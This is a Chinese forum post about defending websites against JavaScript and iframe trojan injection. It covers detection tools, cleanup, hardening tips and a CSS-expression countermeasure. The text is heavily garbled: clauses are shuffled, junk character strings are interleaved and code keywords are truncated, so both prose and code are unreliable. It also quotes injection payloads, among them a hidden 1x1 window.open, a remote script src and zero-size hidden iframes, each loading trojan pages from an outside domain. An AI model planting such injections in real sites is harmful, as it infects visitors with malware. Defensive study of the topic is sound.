搜索
查看: 8117|回复: 0

网站被JS挂马解决方法

[复制链接]
发表于 2010-11-10 08:17:49 | 显示全部楼层 |阅读模式

网站被JS挂马解决方法

" V, S! l& _% b% n; T2 x

为什么网页挂马还是屡见不鲜?这恐怕就要说一说 CSS 挂马了下面我详细讨论 虽然能够巧妙地利用 CSS 代码防范

9 E h& R* J; D q; A

IFRAME 和 JS 脚本挂马。

. v1 |! F. d- K! }+ p; p% ]

检测网页木马也是很重要的一项工作,目前流行的网站被黑,相应的 asp,

0 O( W! j y+ _

网站优化设计当中。htm,j 等文件中,插入以 js 调用方式的本文主要介绍网页挂马的种类、如何检测网页是否被挂马、

/ I0 O* J' ~( |4 o2 q- y

如何清除网页木马。如何防止网页被挂马。
1: 网页挂马的种类 .

1 ?9 [, h. D9 F+ q& l0 M, {4 l- N

相应的 asp, 目前流行的网站被黑。htm,j 等文件中,插入以 js 调用方式的

2 [3 t& a- Y2 y+ [( n0 F/ Y0 b' v

卢松松以前做过的极品源码下载站 ’ 就遇到过 JS 挂马

: t! ], m5 q) ]( q6 E

利用动网程序漏洞 ( 上传附件漏洞 ) 拥有网站管理员权限。删了论坛几千条数据 , 校园闹翻天论坛 ’ 就遇到用户提权

+ h' T% U5 @, q, E

。一千多位会员的 ID

' M2 `% @$ u. @7 p- f8 n( x

2: 如何检测网页是否被挂马。

- Q/ ^# \5 G( R6 ~) n" P

六款免费网页平安检测工具横向测评 ( 华军软件园 )
1 专业检测工具。>

! T* Z) y& `& R; J+ a$ @

或者可以利用 Googl 搜索你网站、博客进行检测。如果有网站有木马则 googl 会在搜索列表的下方提示该网站有不安全

, G; l" ~9 Q9 Q( w3 X7 }$ k

因素。
2 googl 检测。>

0 p% J _; p! p1 f! y

常用的杀毒软件也可以检测出来。
3 杀毒软件检测。>

2 f9 ?$ H8 Z" R' ^

打开你网站、博客,
4 人工检测。点击右键查看源文件,根据网页挂马的种类也可以查看是否中了木马。

3 U5 A9 L! U: S$ |' u) w

5 使用 McAfee SiteAdvisor 平安浏览网页的插件。

. d/ [* V9 N# M J, C

3 H2 i9 {4 w6 V& G( I

3: 如何清除网页木马。

* E/ `' U3 V8 \7 B

就看那些文件是最近修改过的主要检查这些新文件, 一旦中了网页木马。从 FTP 中可以检查文件最近修改时间。然后进

, ~* ^7 l x% S D+ v9 c

入源文件把相关的网页挂马种类的可疑代码删除。

0 u2 p' s: F1 ^: }! X1 }3 \; _

建议删除所有文件 ( 数据库、图片、文档、顺序模板主题等文件夹可以保留 ) 如果你对你所使用的网站、博客程序不熟

- b3 q% d6 [, y, s4 w# `' R, ^0 N2 @

悉。>

# Y, n3 T' ?5 }" B t9 n

请从预防开始吧。
4: 如何防止网页被挂马。如果你网站还没有被挂马。>

6 g9 o" K3 v: z8 E

并只允许信任的人使用上传程序。
1 对网友开放上传附件功能的网站一定要进行身份认证。>

2 @5 {7 ?% {- j( H

2 保证你所使用的顺序及时的更新。

( b7 t. F/ _1 N7 v. \

3 不要在前台网页上加注后台管理程序登陆页面的链接。

* r5 `# R7 Q( A

但不要把备份数据库放在顺序默认的备份目录下。
4 要时常备份数据库等重要文件。>

4 F, _, g n. r& h( U! |& O3 j. b3 x

不能过于简单。
5 管理员的用户名和密码要有一定复杂性。>

: o. M7 T- J5 R$ o5 o0 c* X

二项功能组合,
6 IIS 中禁止写入和目录禁止执行的功能。可以有效的防止 ASP 木马。

# `' G. P9 V/ T9 v" Z

设置执行权限选项中,
7 可以在服务器、虚拟主机控制面板。直接将有上传权限的目录,取消 ASP 运行权限。

2 l; Z3 H" u9 F

8 创建一个 robots.txt 上传到网站根目录。 Robot 能够有效的防范利用搜索引擎窃取信息的骇客

1 s( f: U' g+ ]& r6 x& d% x% Z

* T. [/ p; Y* u( ?( x" N

IFRAME 挂马比较早, < IFRAME 挂马比较早。相应的预防措施也比较多,其中用 CSS 配合 JS 脚本进行预防是主流方式

+ i' e5 F( }5 B

。可这种预防方式也存在平安隐患, JS 脚本也可以被用来挂马,令人防不胜防。下面要介绍反击 JS 挂马的方法。

7 J7 I: ?) I( B6 x2 k1 F* c% X

JS 挂马溯源

2 w8 O* S! Q) z7 T2 i

有经验的平安工程师也开始研究相应的对策,当 IFRAME 逐渐被黑客滥用的时候。一段时间内各种阻止 IFRAME 挂马的方

/ {9 f% A; E: B

法不时涌现,其中通用性较高的就是利用 CSS 配合 JS 脚本防御 IFRAME 挂马。

0 B5 ]& y. \9 _

很多网站都会让网页调用 JS 脚本来实现广告等诸多特效,而黑客也发现。如果将木马挂在 JS 脚本中,所有调用该 JS

) w. M/ U! d% i; S( o( b; y

脚本的网页都等同于被挂上了木马,对于需要肉鸡群的黑客而言是一劳永逸,因此 JS 脚本挂马逐渐开始被黑客应用。

0 I" |3 S; {2 t' C2 e

一种面向对象的脚本语言,小百科: JS 脚本是 JavaScript 脚本语言的简称。目前广泛用于动态网页的编程。需要提示

0 b, B6 c A6 G* W8 ^

大家的 JavaScript 和 Java 除了语法上有一些相似之处,以及都能够当作网页的编程语言以外,两者是完全不相干的而

; v, h4 P0 B4 {+ G. r) a8 |" M% N; a* D

JavaScript 与 Jscript 也不同, Jscript 微软为了迎战 JavaScript 推出的脚本语言。

, G9 _" p5 y6 d9 \3 K! {

但是 JavaScript 一门具有丰富特性的语言,虽然 JavaScript 作为给非程序人员的脚本语言向大众推广。有着和其他编

- h4 D$ W+ X/ }' G2 R7 m, i

程语言一样的复杂性。实际上,必需对 JS 有扎实的理解才干用它来编写比较复杂的顺序,作为一名平安工程师,掌握 JS

% h" |0 G1 I( B2 j- P! x

脚本在工作中会有很大的协助。

4 X/ M6 G2 u/ t% P

挂马原理一点通

+ l; x: I, Y. i- [9 f

可以说优点多得数不过来, JS 脚本挂马对于黑客而言。首先 JS 脚本在挂马时可以直接将 JS 代码写在网页中,也可以

9 ?, R7 P7 Z- A

通过注入网页,让网站远程调取异地 JS 脚本。此外, JS 挂马插入 Web 页面的方法有几十种,绝对够菜鸟们眼花缭乱,

" v5 s/ m$ x" y- t

无从区分木马在何处。

9 g- t0 s2 X% u) ~9 `

如同一个穿着鲜红颜色外衣的劫匪, IFRAME 挂马相对于安全工程师而言。招摇而扎眼,很容易被发现。但是利用 JS 挂

/ K% ~ j( A6 M5 i: K1 g. w# ^

马就意味着这个劫匪拥有了一张可以随时变换的面孔,而且它还能够随时更换衣服。这样的劫匪在平安工程师搜查时,很

; b7 q" D* p# e( m7 W. ~" T3 `

容易蒙混过关,导致木马久杀不绝。

( {" M3 c# M% I6 v1 i

JS 挂马攻防实录

+ t4 _2 u+ ^* |" D8 u

一种是直接将 JavaScript 脚本代码写在网页中,攻现在最多见的 JS 挂马方法有两种。当访问者在浏览网页时,恶意的

9 z( [0 e8 n4 C# J

挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。

" J8 x$ L$ V9 Y* c

这种方法使用的关键代码如下:

9 G5 Q" B4 g6 |( f

"",  window.open "http://www.v404.cn/ 木马

6 c* M& S0 t4 I/ }2 T

.html"."toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1" ;

7 ]% N- w. p% N- s

' q; h8 d3 p6 a8 h

很容易被安全工程师发现,这种代码往往很长。而且没有经验的黑客也喜欢将 “ width 和 “ height= 参数设为 “ 0

+ b$ K) Z5 m1 E0 I

但是设置为 0 后,可能会出现恶意代码不运行的情况。

1 ^, K3 z$ q5 f- u& m

并上传到自己指定的网址。这时黑客只需要在受害者的网站中写入: 另外一种 JS 挂马方式是黑客先将挂马脚本代码 “

7 ]5 ^8 h, ~ r' c

document.writ ' < Iframe src=" 网页木马地址 " ></ifram > ' 写入 Window 中的写字板另存为后缀为 .j 脚本文件

, i! W# ^6 b% l \ i0 S' ?% H

" n; b: H) m. p

<script src="http://www.v404.cn/ 木马脚本 .js"></script>

1 E+ ~2 }# p2 U8 }# I5 F1 U! C

6 j& }8 ]* ] D5 O5 |

或者

J7 \3 M4 A0 J) }$ W0 X' j

document.writ "<div style='display:none'>"

) G) Z, J2 E# A, l

document.writ "<ifram src=" 网页木马地址 " width="0" height="0" scrolling="no" frameborder="0"></iframe>"

h6 R; L5 v6 }/ \- g

document.writ "</div>"
 

, p( y+ e6 U; `7 y$ ~2 J

H+ Q! h+ w4 P' Q

就成功地将木马挂到对方的网页中了

1 D/ Y' E2 h6 [# g

例如黑客有可能会将脚本写为: 小提示:黑客还可以根据情况随机变换拔出的 JS 挂马方法。

A: i+ `( I4 j% k

<div style="behaviour: url http://www.v404.cn/ 木马脚本 .j ;">

: p1 O) f- G' L" {. g$ A7 T

或者:

k8 L1 i- b% c& n8 a

<ifram src="vbscript:[ 挂马脚本 ]">

& L" |) X- g3 O2 P7 Q1 A

4 I/ J0 m, y! Y: s2 J7 c# i5 \


等等 …

( t5 N, i# w9 J& W& g# x

不方便,防第一种 JS 挂马方式。用得非常少,而第二种 JS 挂马方式才是当前主流的所以我主要针对它进行防御。方法

4 I7 L$ l/ g; H0 I' u; H

就是阻止 Src 请求的异地外域的 JS 脚本,代码如下:

5 f$ z. d. c% r) E t8 [. t

iframe{mdy1:express this.src='about:blank', <  iframe{mdy1:express this.src='about:blank'.this.outerHTML=''

8 M' p$ N& C+ l7 u& }

;}

5 q1 b) e! W% y# S' u$ ^: L

script{mzm2:express this.src.toLowerCas .indexOf 'http' ==0 ?document.writ ' 木马被成功隔离 !' :'' ;}
 

# v t5 U- A+ s3 b: U0 R

! v+ b2 q( |1 i4 d

不过这种方法的缺点就是网站的访问者将不能看到被挂了 JS 木马的相关网页。

( z' v C r' i/ ?, G* F2 B

这段代码会让异地外域的 JS 文件在使用 document.writ 时,所以我为安全工程师提供了一段可以中止 JS 脚本运行的

0 T8 p0 R" ?8 N" f

CSS 代码。被 document.clos 强制关闭。这个时侯 JS 挂马的内容往往还没有来得及写完,只有局部被强制输出了

% w/ ^+ B) }$ { u1 v

Writer 后面的内容再不会被写入访问者的电脑中,从而起到防范 JS 脚本挂马的作用。

/ Q9 i6 ]* X- N7 C! g

<title> 让 JS 挂马中止的 CSS 代码 </title>

+ C* Q8 G* M) k. g8 a5 e6 C, d

<styl type="text/css" id="shudoo">

6 @6 m. f3 Q5 ?, V

/*<![CDATA[*/

9 Y' y3 M0 c4 l8 I8 c/ F

this.outerHTML='' ;iframe{mdy1:express this.src='about:blank'.}

, r, G) P6 |, K |; k% j) \ ~2 l

script{mzm2:express this.src.indexOf 'http' ==0 ?document.clos :'' ;}

" u" @% O' ` [% V c3 g

/*]]>*/

4 B- K9 ?5 {4 r/ j4 a: U9 B

</style>

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册帐号

本版积分规则

热议作品
精华帖子排行
精彩推荐

虾皮社区,成立十年了!

站长自己也搞不懂想做个什么,反正就是一直在努力的做!

Copyright © 2007-2019 xp6.org Powered by Discuz

QQ|Archiver|手机版|小黑屋|虾皮社区 鲁公网安备 37021102000261号 |网站地图
返回顶部 返回列表